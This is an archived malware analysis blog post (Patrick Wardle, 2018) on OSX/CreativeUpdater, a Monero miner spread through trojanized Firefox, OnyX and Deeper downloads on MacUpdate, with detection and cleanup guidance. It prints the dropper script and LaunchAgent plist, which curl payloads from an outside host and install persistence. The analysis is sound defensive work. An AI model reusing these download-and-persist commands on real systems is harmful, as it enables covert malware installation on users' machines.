{ "id": "47f9e3a0-259c-45a1-bcf1-680edfa759bb", "created_at": "2026-04-10T03:21:08.628728Z", "updated_at": "2026-04-10T13:11:49.243468Z", "deleted_at": null, "sha1_hash": "48002a270f7989a306f0bf7b40c5eb21e6cde2a6", "title": "Analyzing OSX/CreativeUpdater a macOS cryptominer, distributed via macupdate.com", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 99414, "plain_text": "Analyzing OSX/CreativeUpdater a macOS cryptominer,\r\ndistributed via macupdate.com\r\nBy Patrick Wardle\r\nArchived: 2026-04-10 02:44:00 UTC\r\nBackground\r\nWe’re barely into 2018, and already there is another Mac trojan going around. Targeting macOS users, the\r\nmalware was distributed via infected applications linked to on popular MacUpdate website. Specifically, on\r\nFebruary 1st, the MacUpdate editor ‘Jess-MacUpdate’ added comments on several popular applications such as\r\nFireFox:\r\nYikes!\r\nIn this short blog post we’ll dive into the malware, briefly discussing it’s persistence mechanisms, and capabilities.\r\nBefore diving in, I want to thank the following security researchers and friends:\r\n@noarfromspace who brought the malware to my attention, provided links and insightful comments about\r\nthe malware, and AFAIK gets credit for the name OSX/CreativeUpdater!\r\n@thomasreed who also wrote a comprehensive blog post about this malware: “New Mac cryptominer distributed\r\nvia a MacUpdate hack”. It’s definitely a worthwhile read!\r\n@marcetienne who provided valuable insight into both the discovery and analysis of the malware.\r\nOSX/CreativeUpdater\r\nSo, a user is happily browsing MacUpdate, ends up at their listing for Firefox (or OnyX or Deeper)…and decides\r\nto download it. As noted by Thomas Reed, the download link on the MacUpdate site had been modified to point to\r\na hacker controlled URL which served up the malware:\r\n“The fake Firefox app was distributed from download-installer.cdn-mozilla.net. (Notice the domain\r\nends in cdn-mozilla.net, which is definitely not the same as mozilla.net. This is a common scammer trick\r\nto make you think it’s coming from a legitimate site.)”\r\nThus, instead of the legitimate Firefox application, a trojanized version would be served up to the user in form of a\r\nsigned disk image (Apple Developer ID: Ramos Jaxson):\r\nWe can mount this disk image by double-clicking it, or via the 'hdiutil' utility:\r\n $ hdiutil attach -noverify ~/Downloads/Firefox\\ 58.0.2.dmg\r\nhttps://digitasecurity.com/blog/2018/02/05/creativeupdater/\r\nPage 1 of 8\n\n/dev/disk3s2 Apple_HFS /Volumes/Firefox\r\nFirefox application contained in disk image\r\nThe application shown in the disk image, Firefox.app, is also signed with the same developer ID. The fact the both\r\nthe disk image and application are signed means that Gatekeeper (in it’s default settings) won’t block malware\r\nfrom executing.\r\nLooking at contents of the trojaned Firefox application bundle, shows the main binary ('MozillaFirefox'), plus\r\nreveals another Firefox application as well as a script (aptly named 'script') in the Resources directory:\r\nIt’s easy to confirm the validity of the this second Firefox application by checking it’s digital signature (and\r\nensuring it’s signed by Mozilla). The WhatsYourSign Finder extension, will display this signing information via\r\nthe UI:\r\nSigned Firefox application\r\nAs we’ll shortly see, that malware will execute the legitimate Firefox application so that user will no suspect\r\nanything malicious has occurred!\r\nDecompiling the main executable, 'MozillaFirefox', we can see it looking for the 'script' file:\r\n void -[ScriptExecController loadAppSettings](void * self, void * _cmd) {\r\n r13 = [[var_1B0 pathForResource:@\"script\" ofType:0x0] retain];\r\n r15 = @selector(defaultManager);\r\n r12 = [_objc_msgSend_100015138(@class(NSFileManager), r15) retain];\r\n rbx = [[var_1B0 pathForResource:@\"script\" ofType:0x0] retain];\r\n r14 = [r12 fileExistsAtPath:rbx];\r\n if (r14 == 0x0) {\r\n [Alerts fatalAlert:@\"Corrupt app bundle\"\r\n subText:@\"Script missing from application bundle.\"];\r\n }\r\nIt then executes it, via a call to the '-[ScriptExecController executeScript]' method:\r\n void -[ScriptExecController executeScript](void * self, void * _cmd) {\r\n \r\n rbx = self;\r\n \r\n [rbx prepareForExecution];\r\n [rbx prepareInterfaceForExecution];\r\n *(int8_t *)(rbx + r14) = 0x1;\r\n if (*(int32_t *)\u0026rbx-\u003eexecStyle == 0x1) {\r\n rsi = @selector(executeScriptWithPrivileges);\r\n }\r\nhttps://digitasecurity.com/blog/2018/02/05/creativeupdater/\r\nPage 2 of 8\n\nelse {\r\n rsi = @selector(executeScriptWithoutPrivileges);\r\n }\r\n (*_objc_msgSend)(rbx, rsi);\r\n \r\n return;\r\n }\r\n void -[ScriptExecController executeScriptWithoutPrivileges](void * self, void * _cmd) {\r\n r13-\u003etask = [[NSTask alloc] init];\r\n [r13-\u003etask setLaunchPath:r13-\u003einterpreterPath];\r\n [r13-\u003etask setArguments:r13-\u003earguments];\r\n [r13-\u003etask launch];\r\n ...\r\n }\r\nAs noted by @noarfromspace on Twitter, OSX/CreativeUpdater was created using a legitimate developer tool\r\ncalled Platypus. According to it’s website:\r\n“Platypus is a Mac OS X developer tool that creates native Mac applications from interpreted scripts\r\nsuch as shell scripts or Perl, Ruby and Python programs. This is done by wrapping the script in an\r\napplication bundle along with a native executable binary that runs the script.”\r\nThis explains why the main application (i.e. the trojanized Firefox.app), simply executes the 'script' file when run.\r\nHrmm, where have we seen Platypus used before!? In OSX/Eleanor, and as I noted on twitter it also used\r\nMacUpdate to spread:\r\nIntriguing! Are they related? Who knows…\r\nMoving on, let’s peak at the script that’s executed when the malicious application is started:\r\n $ cat Firefox.app/Contents/Resources/script\r\n \r\nopen Firefox.app\r\nif [ -f ~/Library/mdworker/mdworker ]; then\r\n killall MozillaFirefox\r\nelse\r\n nohup curl -o ~/Library/mdworker.zip\r\n https://public.adobecc.com/files/1U14RSV3MVAHBMEGVS4LZ42AFNYEFF\r\n ?content_disposition=attachment\r\n \u0026\u0026 unzip -o ~/Library/mdworker.zip -d ~/Library\r\n \u0026\u0026 mkdir -p ~/Library/LaunchAgents\r\nhttps://digitasecurity.com/blog/2018/02/05/creativeupdater/\r\nPage 3 of 8\n\n\u0026\u0026 mv ~/Library/mdworker/MacOSupdate.plist ~/Library/LaunchAgents\n \u0026\u0026 sleep 300\n \u0026\u0026 launchctl load -w ~/Library/LaunchAgents/MacOSupdate.plist\n \u0026\u0026 rm -rf ~/Library/mdworker.zip\n \u0026\u0026 killall MozillaFirefox \u0026\nAs Thomas Reed notes:\n”…this code first attempts to open the decoy application. Next, if the malware is already installed, the\nmalicious dropper process is killed, since installation is not necessary. If the malware is not installed, it\nwill download the malware and unzip it into the user’s Library folder…It also installs a malicious\nlaunch agent file named MacOSupdate.plist, which recurrently runs another script.”\nIn other words, it simply downloads and installs a persistent payload. What could this be?\nThough the zip file the malware tries to download (mdworker.zip, from\nhttps://public.adobecc.com/files/1U14RSV3MVAHBMEGVS4LZ42AFNYEFF) is not longer available, luckily\nwe can grab it from VirusTotal.\nFirst, let’s look at the 'MacOSupdate.plist' file: ?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e LabelMacOSupdateProgramArgumentssh-claunchctl unload -w ~/Library/LaunchAgents/MacOS.plist\n \u0026\u0026 rm -rf ~/Library/LaunchAgents/MacOS.plist \u0026\u0026\n curl -o ~/Library/LaunchAgents/MacOS.plist\n https://public.adobecc.com/files/1UJET2WD0VPD5SD0CRLX0EH2UIEEFF?\n content_disposition=attachment\n \u0026\u0026 launchctl load -w ~/Library/LaunchAgents/MacOS.plist\n \u0026\u0026 ~/Library/mdworker/mdworkerRunAtLoad Ok, kinda stupid - just downloads and installs another (new?) version of MacOS.plist.\nhttps://digitasecurity.com/blog/2018/02/05/creativeupdater/\nPage 4 of 8\n\nLooking at these ‘secondary’ instances of the plist, one can see they persistently execute something named\r\n'mdworker' out of the ~/Library/mdworker/ directory:\r\n //version 1\r\n$ cat ~/Library/LaunchAgents/MacOS.plist\r\n...\r\nProgramArguments\r\n sh\r\n -c\r\n \r\n ~/Library/mdworker/mdworker -user sarahmayergo1990@gmail.com -xmr\r\n -proxy socks://104.236.13.101:1080\r\n \r\n//version 2\r\n$ cat ~/Library/LaunchAgents/MacOS.plist\r\nProgramArguments\r\n sh\r\n -c\r\n \r\n ~/Library/mdworker/mdworker -user walker18@protonmail.ch -xmr\r\n \r\nRunning the mdworker binary (in a virtual machine), reveals it’s simply MinerGate’s commandline cryptominer,\r\nminergate-cli:\r\n $ ./mdworker -help\r\nUsage:\r\nminergate-cli [-version] -user [-proxy ]\r\n - []\r\n [- [] ...]\r\n [-o -u [-t ]\r\n [-i ]]\r\nThis utility is freely available for download from: minergate.com/downloads/console.\r\nSince the miner is invoked with the -xmr flag, infected computers will mine Monero. And what about those email\r\naddresses? Thomas notes the mining software will, “periodically connect to minergate.com, passing in the email\r\naddress as the login”\r\nhttps://digitasecurity.com/blog/2018/02/05/creativeupdater/\r\nPage 5 of 8\n\nSo now we fully understand the goal of the malware: mine crypto-currencies. Really nothing too exciting - but a\r\ntrend we’re seeing more and more on macOS!\r\nAnd if you’re wondering who did it? Well, there may be some hints buried within the disk image files. If we look\r\nclosely (as noted by @noarfromspace), there’s a .DS_Store file root directory of the dmg!\r\n $ ls -lart /Volumes/Firefox/ | grep .DS_Store\r\n-rw-r--r--@ 1 user staff 10244 Jan 31 11:18 .DS_Store\r\nAs explained by Wikipedia, the ”.DS_Store is a file that stores custom attributes of its containing folder, such as\r\nthe position of icons or the choice of a background image.” However, .DS_Store files also may contain\r\npaths….such as the original (full) path of the .dmg on the attacker’s machine ��.\r\nLet’s run strings on each the .DS_Store files:\r\n $ strings -a .DS_Store | grep tiago\r\ntiagobrandaomateus\r\n/Users/tiagobrandaomateus/teste/macupdate/Firefox_temp.dmg\r\n$ strings -a /Volumes/OnyX\\ 3.4.2/.DS_Store | grep -i tiago\r\ntiagobrandaomateus\r\n/Users/tiagobrandaomateus/teste/macupdate/OnyX 3.4.2_temp.dmg\r\n$ strings -a /Volumes/Deeper\\ 2.2.7/.DS_Store | grep -i tiago\r\ntiagobrandaomateus\r\n/Users/tiagobrandaomateus/macupdate/deeper-app/Deeper 2.2.7_temp.dmg\r\nInteresting, I wonder who Tiago Brandão Mateus is!?\r\nConclusions\r\nIn this blog post we provided a technical analysis of the newly discovered macOS cryptominer\r\nOSX/CreativeUpdater. Thought not particularly sophisticated nor insidious, by utilizing MacUpdate as it’s\r\ninfection vector it had the potential to infect a large number of users.\r\nLet’s end with a few FAQs!\r\nQ: How does one get infected by OSX/CreativeUpdater?\r\nA: By downloading an infected application from MacUpdates.\r\nSpecifically one of the following applications:\r\n“Firefox 58.0.2 since 1 February 2018”\r\nhttps://digitasecurity.com/blog/2018/02/05/creativeupdater/\r\nPage 6 of 8\n\n“Onyx since 1 February 2018” (likely version 3.4.2)\r\n“Deeper since 1 February 2018” (likely version 2.2.7)\r\nQ: Can I still get infected?\r\nA: Unlikely. MacUpdate notes that they “have removed the [malicious] link[s]”. Moreover, Apple has revoked\r\nthe certificate used to signed the malicious disk images and application:\r\nOnce the certificate has been revoked the disk images won’t mount nor applications run (via the UI):\r\nQ: How can I tell if I’m infected with OSX/CreativeUpdater?\r\nA: First check to see if there is an process named mdworker or sysmdworker running from the\r\n~/Library/mdworker/:\r\n $ ps aux | grep [/]Library/mdworker/\r\nuser 2199 /Users/user/Library/mdworker/mdworker\r\nOne can also look for the persistent artifacts of the malware. This includes following files \u0026 directories:\r\n~/Library/mdworker/\r\n~/Library/LaunchAgents/MacOSupdate.plist\r\nKnockKnock tool will also display the launch agent plist (~/Library/mdworker/MacOSupdate.plist):\r\nQ: On an infected system, what can OSX/CreativeUpdater do?\r\nA: OSX/CreativeUpdater is designed to simply mine Monero (XMR) cryptocoins. While this will likely use a\r\nlarge percentage of your CPU, that’s about all the side-effects. It should be noted that as the malware does (did?)\r\nhave the ability to update itself, that attacker could have provided a customized payload. However at this time,\r\nthere is no indication that this happened.\r\nQ: Your tools will protect from this right?\r\nA: Digita Security is working hard to bring you enterprise ready and supported macOS endpoint protection\r\ncapabilities in 2018! Many of them will be powered by the free Objective-See technologies referenced throughout\r\nthis blog ��\r\nFor example, BlockBlock will detect the persistence (when the malware downloads \u0026 creates the launch agent\r\nplist via curl:\r\nLuLu will also display an alert when the malware connects out (again via curl) to download various components:\r\nWell that wraps up our blog on OSX/CreativeUpdater! Mahalo for reading 😊\r\nSubscribe to the Jamf Blog\r\nhttps://digitasecurity.com/blog/2018/02/05/creativeupdater/\r\nPage 7 of 8\n\nHave market trends, Apple updates and Jamf news delivered directly to your inbox.\r\nTo learn more about how we collect, use, disclose, transfer, and store your information, please visit our Privacy\r\nPolicy.\r\nSource: https://digitasecurity.com/blog/2018/02/05/creativeupdater/\r\nhttps://digitasecurity.com/blog/2018/02/05/creativeupdater/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://digitasecurity.com/blog/2018/02/05/creativeupdater/" ], "report_names": [ "creativeupdater" ], "threat_actors": [], "ts_created_at": 1775791268, "ts_updated_at": 1775826709, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/48002a270f7989a306f0bf7b40c5eb21e6cde2a6.pdf", "text": "https://archive.orkl.eu/48002a270f7989a306f0bf7b40c5eb21e6cde2a6.txt", "img": "https://archive.orkl.eu/48002a270f7989a306f0bf7b40c5eb21e6cde2a6.jpg" } }